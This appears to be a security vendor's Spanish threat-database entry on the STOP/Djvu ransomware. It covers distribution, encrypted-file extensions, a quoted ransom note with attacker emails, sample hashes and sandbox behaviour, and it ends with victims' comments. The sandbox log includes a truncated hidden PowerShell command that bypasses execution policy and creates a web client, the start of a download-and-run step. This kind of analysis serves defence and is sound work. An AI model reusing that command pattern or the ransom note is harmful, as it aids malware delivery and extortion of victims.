Cotización de descuento para licencias múltiples

Cambia región

English Dansk Deutsch Español Français Italiano Nederlands Polski Português Svenska Türkçe Русский हिन्दी 日本語 汉语 漢語 한국어
Base de Datos de Amenazas Ransomware DETENER Djvu Ransomware
3 Comentarios

DETENER Djvu Ransomware

Por GoldSparrow en Ransomware
Traducir a:

La familia STOP ransomware, también denominada familia STOP Djvu Ransomware, es una pieza de malware amenazante. STOP Djvu es solo una de las múltiples amenazas que comparten características comunes y se originan a partir del ransomware STOP, aunque algunos de sus métodos para afectar los tipos de archivos y cifrar las extensiones de archivos difieren.

El STOP Ransomware original fue descubierto por investigadores de seguridad en febrero de 2018. Sin embargo, desde entonces ha evolucionado y su familia de clones y ramificaciones ha crecido. El método principal de distribución del ransomware STOP fueron las campañas de correo electrónico no deseado que utilizaban archivos adjuntos corruptos.

El ransomware STOP Djvu funciona de manera similar a otras amenazas de ransomware de este tipo, cifrando y bloqueando el acceso a los archivos clave que los usuarios pueden estar utilizando en su sistema. Los archivos personales, imágenes, documentos y más se pueden cifrar y básicamente desactivar para todos los usuarios de la máquina. STOP Djvu ransomware se detectó por primera vez en diciembre de 2018 en lo que pareció ser una campaña de infección en línea bastante exitosa. Los investigadores desconocían la forma en que se propagaba el ransomware, pero las víctimas posteriores informaron que estaban descubriendo infecciones después de descargar keygen o cracks. Una vez que se produce la infiltración, STOP Djvu ransomware cambia la configuración de Windows, agregando archivos con una variedad de nombres, como .djvu, .djvus, .djvuu, .uudjvu, .udjvu o .djvuq y las extensiones .promorad y .promock recientes. Las versiones más nuevas aún no tienen un descifrador, pero las más antiguas se pueden descifrar usando STOPDecrypter. Se aconseja a los usuarios que eviten pagar cualquier rescate, pase lo que pase.

El método utilizado para bloquear el acceso a los archivos utiliza el algoritmo de cifrado RSA. Aunque el descifrado de los archivos puede parecer difícil para los usuarios sin experiencia, definitivamente no hay necesidad de hacer ningún esfuerzo para pagar a las personas que están detrás de la amenaza. Las promesas falsas generalmente se dan en tales situaciones, por lo que los usuarios pueden descubrir rápidamente que se ignoran una vez que se realizan los pagos.

Los ataques del ransomware STOP Djvu se informaron por primera vez a finales de 2018. El principal método de distribución para STOP Djvu siguieron siendo los correos electrónicos no deseados y los ajustes al núcleo del ransomware fueron relativamente menores. La mayoría de los archivos adjuntos falsos y comprometidos utilizados en los correos electrónicos no deseados eran documentos de Office habilitados para macros o archivos PDF falsos que ejecutarían el ransomware sin el conocimiento de la víctima. El comportamiento de STOP Djvu tampoco ha cambiado mucho: el ransomware sigue eliminando todas las instantáneas de Shadow Volume para deshacerse de las copias de seguridad y luego comienza a cifrar los archivos de la víctima.

Hay cambios menores en la nota de rescate, que se guarda como '_openme.txt' en el escritorio de la víctima. El texto de la nota de rescate se puede encontrar aquí:

'[inicio de la nota de rescate]
———————— TODOS SUS ARCHIVOS ESTÁN ENCRIPTADOS ————————

¡No se preocupe, puede devolver todos sus archivos!
Todos sus archivos, documentos, fotos, bases de datos y otros importantes están cifrados con el cifrado más fuerte y la clave única.
El único método para recuperar archivos es comprar una herramienta de descifrado y una clave única para usted.
Este software descifrará todos sus archivos cifrados.
¿Qué garantías te damos?
Puede enviar uno de sus archivos cifrados desde su PC y lo desciframos gratis.
Pero podemos descifrar solo 1 archivo de forma gratuita. El archivo no debe contener información valiosa
No intente utilizar herramientas de descifrado de terceros porque destruirá sus archivos.
Descuento del 50% disponible si se comunica con nosotros las primeras 72 horas.

—————————————————————————————————-

Para obtener este software, debe escribir en nuestro correo electrónico:
helphadow@india.com

Reserve la dirección de correo electrónico para contactarnos:
helphadow@firemail.cc

Su identificación personal: [cadena]
[final de la nota de rescate] '

El ransomware se limitó a cambiar el nombre de los archivos cifrados con la extensión .djvu originalmente, lo cual fue una elección curiosa porque .djvu es en realidad un formato de archivo legítimo desarrollado por AT&T Labs y utilizado para almacenar documentos escaneados, algo similar al .pdf de Adobe. Las versiones posteriores del ransomware adoptaron una serie de otras extensiones para archivos encriptados, incluyendo '.chech', '.luceq', '.kroput1,' '.charck,' '.kropun ,,' .luces, '' .pulsar1, ".uudjvu", ".djvur", ".tfude", ".tfudeq" y ".tfudet".

Ciertas cepas del ransomware STOP Djvu se pueden descifrar de forma gratuita, utilizando el llamado 'STOPDecrypter' que fue desarrollado por el investigador de seguridad Michael Gillespie y está disponible en línea como descarga gratuita.

Video DETENER Djvu Ransomware

Consejo: encienda el sonido y mire el video en modo de pantalla completa .

DETENER Djvu Ransomware capturas de pantalla

stop djvu ransomware note

Reporte de análisis

Información general

Family Name: STOP/DJVU Ransomware
Signature status: No Signature

Known Samples

MD5: def8a7bfe5fe47d95a95085d8dbc7a53
SHA1: 7182d4b2f55a560d83edf0824e119f71fa8422b6
SHA256: B83855EA63E7F28396099A5B6E877BE537E78E4A50DF720262461A1D13B02192
Tamaño del archivo: 6.29 MB, 6292105 bytes
MD5: a6b8c0cb178c31dd347554c3e5a0d5f8
SHA1: 91864f269d696ee80869cfeb3c9a204f8031a3bb
SHA256: 4FFB8E9ADF508662B5E51CBEC75B2E07CE1CBBFAAB873F72EDC7BAC385421E2C
Tamaño del archivo: 3.47 MB, 3471869 bytes
MD5: 2336c9624d9a44c393d354206226f508
SHA1: ea7edc388ad62990f52b9ed40df26d20f4e20190
SHA256: CE48ED04C92143B7E91F9665DD9337B2EE0B9CC1B5AEE534D26C09E084F8ABB0
Tamaño del archivo: 1.36 MB, 1359918 bytes
MD5: 42f32aa699bc45a3638ddeb325ebebc1
SHA1: 508cea3ba2bf04cc6851295f92bf0e752071f6b8
SHA256: 16532B38591B713395C288B11610494BCC4C4537BE492D43C54D66FEB7B95FA4
Tamaño del archivo: 1.33 MB, 1328186 bytes
MD5: 2391d41548b6432191f73edefa273928
SHA1: 620b714f84955aa7fb9a2f2cd528daa1621e18af
SHA256: 4D1EFAA3477B0B8D84025F3F0109E97ABA7CEB37F174B9DC79B7966CBB430959
Tamaño del archivo: 3.36 MB, 3357556 bytes
Show More
MD5: 710c3a1beb616d4aa7d5ed9a7f8848e4
SHA1: 326da9ddc0ea840e83f31fbf1f3377a06c911fe5
SHA256: 051DAB5E5247E25D6EB059A574383FB1EC99A5A4AAF9AA3694240FE25FA260AB
Tamaño del archivo: 1.36 MB, 1364106 bytes
MD5: 601b120a6f39f72847b2f581a3d5f158
SHA1: 0cc5781c1cfe6c5d034bd098229773e80e083732
SHA256: BEC2BFF460615A35D4EA35BF25E9F89337E35E73441A4AC07562CE8E89BED818
Tamaño del archivo: 4.86 MB, 4858569 bytes
MD5: a7b76a49f289081961f8f3824f0b62ca
SHA1: 6908790199785be7fc6c4eeb1fe426ee1b66cc0b
SHA256: 1A721E054386833AEBBF94C75871143376897E92C4A48278DDE95E6987634F45
Tamaño del archivo: 1.41 MB, 1406899 bytes
MD5: 9f37930d62a1e08f68aa0a72472e7a55
SHA1: 27706b3ff639e5dfa264a823dbe9229cf34ae153
SHA256: 29039902EEA4EE24C4C6368AA9B1D7F86BEC65ADA3ABDB0B92C1FEF311ACD31F
Tamaño del archivo: 600.12 KB, 600124 bytes
MD5: 7a18839fe61e9cde0e8fea3100acfb2b
SHA1: 9476c97a73e027016e9f6f2f20c2fb19264cd837
SHA256: 0271095F0AD5C6F26C9738ED5636E751B8868C1AE3B08D5D8C5218121D9FEEAF
Tamaño del archivo: 316.83 KB, 316832 bytes
MD5: fe17d0f940a226e80cc18b4399da4ffc
SHA1: cc1bd23b0c7ff5da8ff996717b3969b7ebb9c67b
SHA256: D869A00DFA1BE0DF6D08BB72B790894D1861834D5E350F5DD54A70C3711BA713
Tamaño del archivo: 1.36 MB, 1363661 bytes
MD5: ed83bea5600457af815495b10f235b87
SHA1: 14ac62ce3ae6b19186544e46ad7710d1814e3a9c
SHA256: FC0AE843E31F77574448FF343F0E92A9F1953B43DC2495FFE2CA5F7F8E777401
Tamaño del archivo: 9.59 MB, 9590154 bytes

Windows Portable Executable Attributes

  • File doesn't have "Rich" header
  • File doesn't have debug information
  • File doesn't have exports table
  • File doesn't have relocations information
  • File doesn't have security information
  • File has exports table
  • File has TLS information
  • File is 32-bit executable
  • File is 64-bit executable
  • File is either console or GUI application
Show More
  • File is GUI application (IMAGE_SUBSYSTEM_WINDOWS_GUI)
  • File is Native application (NOT .NET application)
  • File is not packed
  • IMAGE_FILE_DLL is not set inside PE header (Executable)
  • IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)

File Icons

Windows PE Version Information

Nombre Valor
Assembly Version 1.4.1.0
Comments This installation was built with Inno Setup.
Company Name
  • Alexander Roshal
  • TrayToolbar
  • win.rar GmbH
  • WinTools Software Engineering, Ltd.
File Description
  • Archiwizer WinRAR
  • Gestione archivi WinRAR
  • RAM Saver Professional
  • TrayToolbar
  • WinRAR 5.60 64 Bit Setup
  • WinRAR archiver
  • WinRAR Installer
File Version
  • 26.3.1
  • 26.2.1
  • 26.0.1
  • 25.7.1
  • 25.4.1
  • 7.21.0.0
  • 6.20.2
  • 6.2.0
  • 1.4.1.0
  • 1.3.0.0
Show More
  • 1.00
Internal Name
  • TJprojMain
  • TrayToolbar.dll
  • WinRAR
  • winrar-7.21-setup
Legal Copyright
  • Copyright © 1993-2026 Александр Рошал
  • Copyright © Alexander Roshal 1993-2021
  • Copyright © Alexander Roshal 1993-2022
  • Copyright © Alexander Roshal 1993-2025
  • © Brontech, LLC
Original Filename
  • TJprojMain.exe
  • TrayToolbar.dll
  • winrar-7.21-setup.exe
  • WinRAR.exe
Product Name
  • Project1
  • RAM Saver 25.4.1 Professional
  • RAM Saver 25.7.1 Professional
  • RAM Saver 26.0.1 Professional
  • RAM Saver 26.2.1 Professional
  • RAM Saver 26.3.1 Professional
  • TrayToolbar
  • WinRAR
  • WinRAR 5.60 64 Bit
  • WinRAR Installer
Product Version
  • 26.3.1
  • 26.2.1
  • 26.0.1
  • 25.7.1
  • 25.4.1
  • 7.21
  • 6.20.2
  • 6.2.0
  • 5.60
  • 1.4.1+80dec33e25323db7125ddec35b475aa881292801
Show More
  • 1.4.0
  • 1.00

Digital Signatures

Signer Root Status
win.rar GmbH DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1 Self Signed
win.rar GmbH GlobalSign CodeSigning CA - SHA256 - G3 Hash Mismatch

File Traits

  • .NET
  • 2+ executable sections
  • big overlay
  • fptable
  • HighEntropy
  • Inno
  • InnoSetup Installer
  • Installer Manifest
  • Installer Version
  • MZ (In Overlay)
Show More
  • No Version Info
  • Nullsoft Installer
  • RAR (In Overlay)
  • RARinO
  • Run
  • SusSec
  • vb6
  • WinRAR SFX
  • WRARSFX
  • x64
  • x86

Files Modified

File Attributes
\device\namedpipe Generic Read,Write Attributes
\device\namedpipe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-13e8d.tmp\508cea3ba2bf04cc6851295f92bf0e752071f6b8_0001328186.tmp Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-2buvv.tmp\_isetup\_setup64.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\is-88uan.tmp\ea7edc388ad62990f52b9ed40df26d20f4e20190_0001359918.tmp Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-8gkji.tmp\0cc5781c1cfe6c5d034bd098229773e80e083732_0004858569.tmp Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-af9e7.tmp\_isetup\_setup64.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\is-du263.tmp\326da9ddc0ea840e83f31fbf1f3377a06c911fe5_0001364106.tmp Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-i0kj9.tmp\6908790199785be7fc6c4eeb1fe426ee1b66cc0b_0001406899.tmp Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-jos42.tmp\_isetup\_setup64.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data
Show More
c:\users\user\appdata\local\temp\is-l4opd.tmp\cc1bd23b0c7ff5da8ff996717b3969b7ebb9c67b_0001363661.tmp Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-pk5hm.tmp\_isetup\_setup64.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\is-r9udb.tmp\_isetup\_setup64.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\is-shkd6.tmp\_isetup\_setup64.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\nshfa46.tmp\chip.bmp Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nshfa46.tmp\header.bmp Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nshfa46.tmp\nsdialogs.dll Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nshfa46.tmp\screenshot.bmp Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nshfa46.tmp\system.dll Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nshfa46.tmp\winrar-x64-721b1ru.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nshfa46.tmp\yandex.bmp Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nshfa46.tmp\yandexbrowsersetup.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsrfa35.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete
c:\users\user\appdata\local\temp\nsva331.tmp\banner.dll Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsva331.tmp\nsexec.dll Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsva331.tmp\system.dll Generic Write,Read Attributes

Registry Modifications

Key::Value Datos API Name
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 졷鑂셱ǜ RegNtPreCreateKey

Windows API Usage

Category API
Other Suspicious
  • SetWindowsHookEx
Anti Debug
  • IsDebuggerPresent
  • OutputDebugString
User Data Access
  • GetUserDefaultLocaleName
  • GetUserObjectInformation
Process Manipulation Evasion
  • NtUnmapViewOfSection
  • ZwMapViewOfSection
Process Shell Execute
  • CreateProcess
Keyboard Access
  • GetKeyState
Syscall Use
  • ntdll.dll!NtAccessCheck
  • ntdll.dll!NtAlertThreadByThreadId
  • ntdll.dll!NtAlpcConnectPortEx
  • ntdll.dll!NtAlpcCreateSecurityContext
  • ntdll.dll!NtAlpcDeleteSecurityContext
  • ntdll.dll!NtAlpcQueryInformation
  • ntdll.dll!NtAlpcSendWaitReceivePort
  • ntdll.dll!NtApphelpCacheControl
  • ntdll.dll!NtClearEvent
  • ntdll.dll!NtClose
Show More
  • ntdll.dll!NtConnectPort
  • ntdll.dll!NtCreateEvent
  • ntdll.dll!NtCreateMutant
  • ntdll.dll!NtCreateSection
  • ntdll.dll!NtCreateSemaphore
  • ntdll.dll!NtCreateThreadEx
  • ntdll.dll!NtDuplicateObject
  • ntdll.dll!NtDuplicateToken
  • ntdll.dll!NtEnumerateValueKey
  • ntdll.dll!NtFreeVirtualMemory
  • ntdll.dll!NtMapViewOfSection
  • ntdll.dll!NtNotifyChangeKey
  • ntdll.dll!NtOpenDirectoryObject
  • ntdll.dll!NtOpenEvent
  • ntdll.dll!NtOpenFile
  • ntdll.dll!NtOpenKey
  • ntdll.dll!NtOpenKeyEx
  • ntdll.dll!NtOpenProcessToken
  • ntdll.dll!NtOpenProcessTokenEx
  • ntdll.dll!NtOpenSection
  • ntdll.dll!NtOpenSemaphore
  • ntdll.dll!NtOpenThreadToken
  • ntdll.dll!NtOpenThreadTokenEx
  • ntdll.dll!NtProtectVirtualMemory
  • ntdll.dll!NtQueryAttributesFile
  • ntdll.dll!NtQueryFullAttributesFile
  • ntdll.dll!NtQueryInformationFile
  • ntdll.dll!NtQueryInformationProcess
  • ntdll.dll!NtQueryInformationThread
  • ntdll.dll!NtQueryInformationToken
  • ntdll.dll!NtQueryKey
  • ntdll.dll!NtQueryLicenseValue
  • ntdll.dll!NtQueryPerformanceCounter
  • ntdll.dll!NtQuerySecurityAttributesToken
  • ntdll.dll!NtQuerySecurityObject
  • ntdll.dll!NtQuerySystemInformation
  • ntdll.dll!NtQuerySystemInformationEx
  • ntdll.dll!NtQueryValueKey
  • ntdll.dll!NtQueryVirtualMemory
  • ntdll.dll!NtQueryVolumeInformationFile
  • ntdll.dll!NtQueryWnfStateData
  • ntdll.dll!NtReleaseMutant
  • ntdll.dll!NtReleaseSemaphore
  • ntdll.dll!NtReleaseWorkerFactoryWorker
  • ntdll.dll!NtRequestWaitReplyPort
  • ntdll.dll!NtResumeThread
  • ntdll.dll!NtSetEvent
  • ntdll.dll!NtSetInformationKey
  • ntdll.dll!NtSetInformationProcess
  • ntdll.dll!NtSetInformationThread
  • ntdll.dll!NtSetInformationVirtualMemory
  • ntdll.dll!NtSetInformationWorkerFactory
  • ntdll.dll!NtSetTimer2
  • ntdll.dll!NtSubscribeWnfStateChange
  • ntdll.dll!NtTestAlert
  • ntdll.dll!NtTraceControl
  • ntdll.dll!NtUnmapViewOfSection
  • ntdll.dll!NtUnmapViewOfSectionEx
  • ntdll.dll!NtWaitForAlertByThreadId
  • ntdll.dll!NtWaitForMultipleObjects
  • ntdll.dll!NtWaitForSingleObject
  • ntdll.dll!NtWaitForWorkViaWorkerFactory
  • ntdll.dll!NtWaitLowEventPair
  • ntdll.dll!NtWorkerFactoryWorkerReady
  • ntdll.dll!NtWriteFile
  • UNKNOWN
Encryption Used
  • BCryptOpenAlgorithmProvider

Shell Command Execution

"C:\Users\Lehsoaco\AppData\Local\Temp\is-88UAN.tmp\ea7edc388ad62990f52b9ed40df26d20f4e20190_0001359918.tmp" /SL5="$5036E,928289,131584,c:\users\user\downloads\ea7edc388ad62990f52b9ed40df26d20f4e20190_0001359918"
"C:\Users\Dfhrhqtz\AppData\Local\Temp\is-13E8D.tmp\508cea3ba2bf04cc6851295f92bf0e752071f6b8_0001328186.tmp" /SL5="$802E8,896816,131584,c:\users\user\downloads\508cea3ba2bf04cc6851295f92bf0e752071f6b8_0001328186"
"C:\Users\Eberzneu\AppData\Local\Temp\is-DU263.tmp\326da9ddc0ea840e83f31fbf1f3377a06c911fe5_0001364106.tmp" /SL5="$30364,932379,131584,c:\users\user\downloads\326da9ddc0ea840e83f31fbf1f3377a06c911fe5_0001364106"
"C:\Users\Qxnqehmu\AppData\Local\Temp\is-8GKJI.tmp\0cc5781c1cfe6c5d034bd098229773e80e083732_0004858569.tmp" /SL5="$402E8,3435751,309760,c:\users\user\downloads\0cc5781c1cfe6c5d034bd098229773e80e083732_0004858569"
"C:\Users\Qlwpcgcn\AppData\Local\Temp\is-I0KJ9.tmp\6908790199785be7fc6c4eeb1fe426ee1b66cc0b_0001406899.tmp" /SL5="$30336,975597,131584,c:\users\user\downloads\6908790199785be7fc6c4eeb1fe426ee1b66cc0b_0001406899"
Show More
powershell -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "try { $WebClient = New-Object System.Net.WebClient
"C:\Users\Czxnhiuo\AppData\Local\Temp\is-L4OPD.tmp\cc1bd23b0c7ff5da8ff996717b3969b7ebb9c67b_0001363661.tmp" /SL5="$40356,931898,131584,c:\users\user\downloads\cc1bd23b0c7ff5da8ff996717b3969b7ebb9c67b_0001363661"

3 Comentarios

RUBEN MIRANDA Respuesta

I have problem with a ransomware. It encrypts files and appends the ".pcqq" extension to their filenames. All my documents laptop and external Hard Disk was encrypted. So, I may use the Spyhunter 5 to remove the Pcqq ransomware?

lourdes Respuesta

hay alguna herramienta para desencriptar archivos con la terminación .pcqq tengo entendido que es de Stop Djvu, mi maquina ya esta desinfectada con su software, solo me resta poder desencriptar mis archivos, gracias.

Brian Lopez Respuesta

I have the ransomware virus on my laptop. It encrypted all my files with rrcc. Can Spy Hunter decrypt it? or something help me? Please, I have very valuable things to recover...

Tendencias

Estafa de correo electrónico de inicio de sesión no...

Suplantación de identidad (phishing), Correo basura
3
Los correos electrónicos inesperados que afirman que se ha detectado actividad sospechosa en una cuenta siempre deben tratarse con precaución. Los ciberdelincuentes suelen disfrazar los intentos de phishing como notificaciones de seguridad urgentes para presionar a los destinatarios a reaccionar sin pensarlo bien. Los correos electrónicos conocidos como "Inicio de sesión no reconocido de...

Mas Visto

Cargando...